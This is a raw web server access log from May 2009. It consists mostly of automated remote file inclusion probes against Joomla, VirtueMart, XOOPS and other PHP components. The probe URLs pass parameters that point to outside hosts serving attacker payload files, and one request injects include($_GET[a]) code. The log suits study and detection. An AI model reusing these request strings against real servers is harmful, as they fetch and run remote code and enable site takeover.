122.153.212.195 - - [13/May/2009:00:55:25 -0400] "GET /logs/access_log.Q109040700%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.153.212.195 - - [13/May/2009:00:55:25 -0400] "GET /logs/access_log.Q108111200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
87.106.135.14 - - [13/May/2009:00:55:35 -0400] "GET /logs/access_log.Q108110900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
222.239.76.25 - - [13/May/2009:00:55:37 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.239.76.25 - - [13/May/2009:00:55:37 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.239.76.25 - - [13/May/2009:00:55:37 -0400] "GET /logs/access_log.Q109040400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [13/May/2009:00:55:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.116.178.20 - - [13/May/2009:00:56:40 -0400] "GET /logs/access_log.Q109032100%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
122.116.178.20 - - [13/May/2009:00:56:40 -0400] "GET /logs/access_log.Q109042500%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
122.153.212.195 - - [13/May/2009:00:56:44 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.153.212.195 - - [13/May/2009:00:56:45 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.153.212.195 - - [13/May/2009:00:56:45 -0400] "GET /logs/access_log.Q108121200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
202.75.4.169 - - [13/May/2009:00:56:46 -0400] "GET /logs/access_log.Q108100500/index.php?option=com_jpack&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
85.18.117.101 - - [13/May/2009:00:56:46 -0400] "GET /logs/access_log.Q108090400//skin/zero_vote/error.php?dir=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
202.75.4.169 - - [13/May/2009:00:56:47 -0400] "GET /index.php?option=com_jpack&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
202.75.4.169 - - [13/May/2009:00:56:48 -0400] "GET /logs/index.php?option=com_jpack&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
88.84.128.40 - - [13/May/2009:00:56:59 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
88.84.128.40 - - [13/May/2009:00:56:59 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
88.84.128.40 - - [13/May/2009:00:56:59 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
145.253.245.211 - - [13/May/2009:00:57:02 -0400] "GET /logs/access_log.Q109020500/index.php?option=com_login&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
122.153.212.195 - - [13/May/2009:00:57:03 -0400] "GET /logs/access_log.Q108112400/twindow_notice.php?shop_this_skin_pathhttp://www.project80s.com/id.gif??? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
222.239.76.25 - - [13/May/2009:00:57:03 -0400] "GET /logs/access_log.Q109040400%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
77.221.130.2 - - [13/May/2009:00:57:14 -0400] "GET /logs/access_log.Q108090400//skin/zero_vote/error.php?dir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
221.251.28.84 - - [13/May/2009:00:57:18 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):9600313 HTTP/1.1" 200 45669 "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [13/May/2009:00:57:20 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):9600313" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [13/May/2009:00:57:20 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):9600313" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
221.251.28.84 - - [13/May/2009:00:57:21 -0400] "GET /images/items/TRUTACKS_THUMB.JPG HTTP/1.1" 200 15841 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):9600313" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
222.239.76.25 - - [13/May/2009:00:58:08 -0400] "GET /logs/access_log.Q109040700%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
222.239.76.25 - - [13/May/2009:00:58:16 -0400] "GET /logs/access_log.Q109040300%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
217.18.76.16 - - [13/May/2009:00:58:45 -0400] "GET /logs/access_log.Q108092700/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:00:58:45 -0400] "GET /logs/access_log.Q108090200/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:00:58:45 -0400] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:00:58:46 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:00:58:46 -0400] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
217.18.76.16 - - [13/May/2009:00:58:46 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
216.117.191.71 - - [13/May/2009:00:59:01 -0400] "GET /logs/access_log.Q108090200/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:00:59:02 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
218.185.20.88 - - [13/May/2009:00:59:02 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:59:02 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:59:02 -0400] "GET /logs/access_log.Q109041900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
216.117.191.71 - - [13/May/2009:00:59:02 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.65"
218.185.20.88 - - [13/May/2009:00:59:08 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:59:08 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:59:08 -0400] "GET /logs/access_log.Q109041900//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
216.117.191.71 - - [13/May/2009:00:59:19 -0400] "GET /logs/access_log.Q108110900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
87.106.135.14 - - [13/May/2009:00:59:24 -0400] "GET /logs/access_log.Q108090200/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:00:59:24 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:00:59:24 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
72.55.164.230 - - [13/May/2009:00:59:27 -0400] "GET /logs/access_log.Q109012800//bemarket/postscript/postscript.php?p_mode=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.820"
72.55.164.230 - - [13/May/2009:00:59:27 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.820"
72.55.164.230 - - [13/May/2009:00:59:27 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.820"
77.221.130.2 - - [13/May/2009:00:59:31 -0400] "GET /logs/access_log.Q108090400//skin/zero_vote/error.php?dir=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
217.18.76.16 - - [13/May/2009:00:59:39 -0400] "GET /logs/access_log.Q108102500/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.805"
218.185.20.88 - - [13/May/2009:00:59:42 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:59:42 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:00:59:42 -0400] "GET /logs/access_log.Q109041900%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
87.106.135.14 - - [13/May/2009:00:59:42 -0400] "GET /logs/access_log.Q108110900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
202.75.4.169 - - [13/May/2009:00:59:44 -0400] "GET /logs/access_log.Q109050200/index.php?option=com_jpack&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
123.143.98.5 - - [13/May/2009:00:59:45 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:00:59:45 -0400] "GET /logs/access_log.Q108081600%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:00:59:45 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.249.36.194 - - [13/May/2009:00:59:48 -0400] "GET //index.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [13/May/2009:00:59:48 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [13/May/2009:00:59:48 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:00:59:48 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:00:59:48 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:00:59:48 -0400] "GET /logs/access_log.Q108081600%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
218.249.36.194 - - [13/May/2009:00:59:54 -0400] "GET /logs/access_log.Q108072300//index.php?DOCUMENT_ROOT=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [13/May/2009:01:00:04 -0400] "GET /logs/access_log.Q108120400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormpages.com/arieee/fx29id.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
122.116.178.20 - - [13/May/2009:05:12:09 -0400] "GET /logs/access_log.Q108122800%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
94.23.54.200 - - [13/May/2009:05:12:09 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 249 "-" "libwww-perl/5.813"
218.249.36.194 - - [13/May/2009:05:12:09 -0400] "GET /logs/access_log.Q108082100%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
218.249.36.194 - - [13/May/2009:05:12:09 -0400] "GET /logs/access_log.Q108083000%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
94.23.54.200 - - [13/May/2009:05:12:09 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 254 "-" "libwww-perl/5.813"
122.116.178.20 - - [13/May/2009:05:12:09 -0400] "GET /logs/access_log.Q108090100%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:05:12:09 -0400] "GET /logs/access_log.Q108122800%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:05:12:09 -0400] "GET /logs/access_log.Q108090100%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
94.23.54.200 - - [13/May/2009:05:12:09 -0400] "GET /logs/access_log.Q109050300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 276 "-" "libwww-perl/5.813"
218.249.36.194 - - [13/May/2009:05:12:25 -0400] "GET /logs/access_log.Q108083000%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
218.249.36.194 - - [13/May/2009:05:12:25 -0400] "GET /logs/access_log.Q108082100%20%20/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://gmissn.3dn.ru/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
216.176.196.171 - - [13/May/2009:05:12:25 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
216.176.196.171 - - [13/May/2009:05:12:27 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
216.176.196.171 - - [13/May/2009:05:12:27 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
84.32.195.2 - - [13/May/2009:05:12:27 -0400] "GET /logs/access_log.Q108090900//?_zb_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
84.32.195.2 - - [13/May/2009:05:12:27 -0400] "GET //?_zb_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
84.32.195.2 - - [13/May/2009:05:12:27 -0400] "GET /logs//?_zb_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
216.176.196.171 - - [13/May/2009:05:12:33 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
222.122.160.145 - - [13/May/2009:05:12:54 -0400] "GET //?_zb_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
222.122.160.145 - - [13/May/2009:05:12:54 -0400] "GET /logs//?_zb_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
222.122.160.145 - - [13/May/2009:05:12:54 -0400] "GET /logs/access_log.Q108101700//?_zb_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
85.18.117.101 - - [13/May/2009:05:13:26 -0400] "GET /logs/access_log.Q108090100%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:05:13:26 -0400] "GET /logs/access_log.Q108122800%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
213.175.201.250 - - [13/May/2009:05:13:55 -0400] "GET /logs/access_log.Q109022600//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
213.175.201.250 - - [13/May/2009:05:13:55 -0400] "GET /logs/access_log.Q109022600//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
213.175.201.250 - - [13/May/2009:05:13:55 -0400] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
213.175.201.250 - - [13/May/2009:05:13:55 -0400] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
213.175.201.250 - - [13/May/2009:05:13:55 -0400] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
213.175.201.250 - - [13/May/2009:05:13:55 -0400] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:05:14:01 -0400] "GET /logs/access_log.Q108122800%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
202.89.33.167 - - [13/May/2009:05:14:17 -0400] "GET /logs/access_log.Q108090100%20%20//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 305 "-" "Mozilla/5.0"
58.227.193.198 - - [13/May/2009:05:15:02 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
122.116.178.20 - - [13/May/2009:05:15:01 -0400] "GET /logs/access_log.Q108062800//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.227.193.198 - - [13/May/2009:05:15:08 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
58.227.193.198 - - [13/May/2009:05:15:08 -0400] "GET /logs/access_log.Q109022200%20%20//modules/xfsection/modify.php?dir_module=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
58.227.193.198 - - [13/May/2009:05:16:29 -0400] "GET /logs/access_log.Q109022200//modules/xfsection/modify.php?dir_module=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
